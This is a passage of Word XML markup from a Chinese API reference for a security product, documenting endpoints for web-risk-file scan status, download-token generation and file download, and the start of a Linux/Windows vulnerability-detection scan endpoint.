    <w:p w14:paraId="638CAD0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D73851" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2998538B"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630"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="2095"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="750BB1F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3C9C659" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ECB2FC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F4D144" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="720CEDCC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A31E0F2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CB7C239" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10A2EF09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55B8D614" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EF9A4BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="268F682D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="web风险文件查询扫描状态"/>
      <w:bookmarkEnd w:id="108"/>
      <w:r>
        <w:t>Web风险文件查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C4C07" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供web风险文件扫描任务的状态查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151DA5E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D723DF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/websecurity/weakfile/{linux|win}/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C055FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AFD79F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEFF39C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23618376" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/external/api/websecurity/weakfile/linux/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD0CE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE4B4E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "retcode": 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC4081"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941"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="7175"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="22F1811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4437F30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C7324AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78533C04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C325B9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7B2EE399" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25F2D84E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7060E699" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="507B799C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BF54398" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>-1-无任务；0-未开始执行；1-排队执行；2-正在执行；3-执行成功；4-执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50DE6C6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="生成下载文件"/>
      <w:bookmarkEnd w:id="109"/>
      <w:r>
        <w:t>生成下载文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF27792" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供web风险文件的生成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E22469" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659B9A19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/websecurity/weakfile/{linux|win}/download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7395A3"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="44E0411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6405EE9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E86028A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="161C1F35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FE5FB23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="33B40196" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A2EAF61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C0AFEC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CDC9FEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66F081E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BADB7B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D308E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/websecurity/weakfile/{linux|win}/download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ECB251" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5081BBA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "message": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "ready": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "token": "558a45bedc41046dd1c4342d0e75e269"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C088A33"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763"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="6993"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3CC3C80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EAA9787" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4183D715" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79DF0D94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D18D582" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F4D8FA8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DDE5CE3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ready</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="169E32DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E11AC7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17130257" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0-文件没有准备好，应该轮巡继续调用该接口；1-文件已经准备好；-1-文件下载失败，应提示失败并停止轮询</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2218C2A7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D8D07E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56743980" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43CEB998" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CB2CABE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>下载的令牌</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AF03C3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="web风险文件下载"/>
      <w:bookmarkEnd w:id="110"/>
      <w:r>
        <w:t>Web风险文件下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D43B325" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供web风险文件下载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093C7B1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704BFE38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/websecurity/weakfile/{linux|win}/download/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E649FC2"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="020FDD7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551A13A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A3206A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="181F3D08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01750A11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="12DE2D7D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35AF9C96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D16E59E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6273B5B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C0E123C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7083D5E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB1A8F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/websecurity/weakfile/linux/download/5a790f0b7d761b6bc78e1116?token=558a45bedc41046dd1c4342d0e75e269</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AB6EBC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C3F0D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFA8FE9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回rows部分说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336FE5DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>文件内容，文件名在header头中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D231D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="linuxwindows漏洞检测"/>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="111"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Linux/Windows漏洞检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CDF34C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows漏洞检测和查询，Linux/Windows漏洞检测作业管理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFB7250" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="linux漏洞检测扫描"/>
      <w:r>
        <w:t>Linux漏洞检测扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5D60BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux漏洞检测开始执行扫描任务功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555558A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4635D8DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/{linux|win}/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACCFE29"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497C54" w14:paraId="3A10BDE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53F3200" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="246E124D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
